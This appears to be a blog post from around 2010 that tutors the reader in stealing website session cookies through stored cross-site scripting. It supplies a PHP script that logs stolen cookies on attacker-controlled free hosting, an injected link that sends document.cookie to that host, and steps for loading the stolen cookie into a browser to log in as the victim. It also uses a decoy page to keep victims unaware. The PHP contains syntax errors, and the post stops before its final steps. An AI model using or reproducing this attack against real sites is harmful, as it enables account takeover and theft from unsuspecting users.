This is a tutorial video about how to steal cookie using Cross Site Scripting (XSS) trick. Once you got victim's cookie, you can login using his/her account even without knowing his/her password. If you have critiques, suggestions, questions, just drop your comments here :)

Things you will use :
  1. Notepad
  2. Google
  3. Mozilla 3.0 or higher
  4. Mozilla Addons - Firebug 1.4.5
  5. Mozilla Addons - Firecookie 1.0b4 (extension for Firebug)
  6. Web hosting (use free hosting such as www.0fees.net)
  7. Target website

Scenario :
  1. www.abcde.co.id is a website vulnerable to Cross Site Scripting (XSS) attack.
  2. When its member logined, system will create a cookie to keep him logined.
  3. Its member can post something, including html/ java script code in the textbox, even other non-logined users can see that text.
  4. So, an attacker puts a link in the textbox to trap other members.
  5. That link actually will execute a cookie stealing script that attacker has uploaded into a web hosting before.
  6. If another members see and click the link, his/her cookie will be logged/recorded in the text file located in the attacker's web hosting.
  7. Then, the attacker opens the text file, get the cookie name and values.
  8. Using Firebug and Firecookie add-ons in Mozilla, the attacker can copy that cookie into browser and login to www.abcde.co.id using target's account, even without knowing his/her target's password.
Now, here's the tutorial :
  • Open notepad and copy paste this code below.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$date = date ("I ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER_AGENT']
$file = fopen ('log.txt', 'a');
fwrite($file,"DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n")
fclose($file);

echo '<br>Sorry, this page is under construction</br></br></br>Please click <a href="http://www.anywebsiteyouwanttorefer.com">here</a> to go back to previous page.

?>
  • Then, you save it as "something.php"
  • Create new notepad, leave it empty and save it as "log.txt"
  • Now, you go to your web hosting (if you don't have one, you can register at www.0fees.net for free)
  • Upload the files that you created before "something.php" and "log.txt" into htdocs (other web hosting may different ) ** DONT FORGET TO WRITE DOWN THE URL OF SOMETHING.PHP **
  • Change the permission of files to 777 using chmod.
  • Now, go to the www.abcde.co.id (target website) and using you or your friend's account, injected a html and java script code into the textbox.
Copy and paste the code below into the textbox :

<a onclick="document.location='http://www.yourweb.0fees.net/something.php?cookie='+escape(document.cookie);" href="#">Click Here For Details.</a>

Wait for victim... supposed someone will login into website.
  • And if the luck is on the attacker when the victim see the link and clicked it. It will go direct to the page that said "The page is under construction" as it written in something.php. Then, the victim click on the back link, everything back to normal page while the attacker making victim not to think any suspicious on the page before.
  • Now, the attacker can open the log.txt and get the victim's cookie and values.
  • Once you get the cookie, convert the encoded to ascii. (www.centricle.com - ascii convertor)
  • The attacker will find out username's victim.
  • The attacker will clear all cookie in mozilla. open firebug add-ons to create and edit cookie.
There's still more, i will update it later... need sleep now..!

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me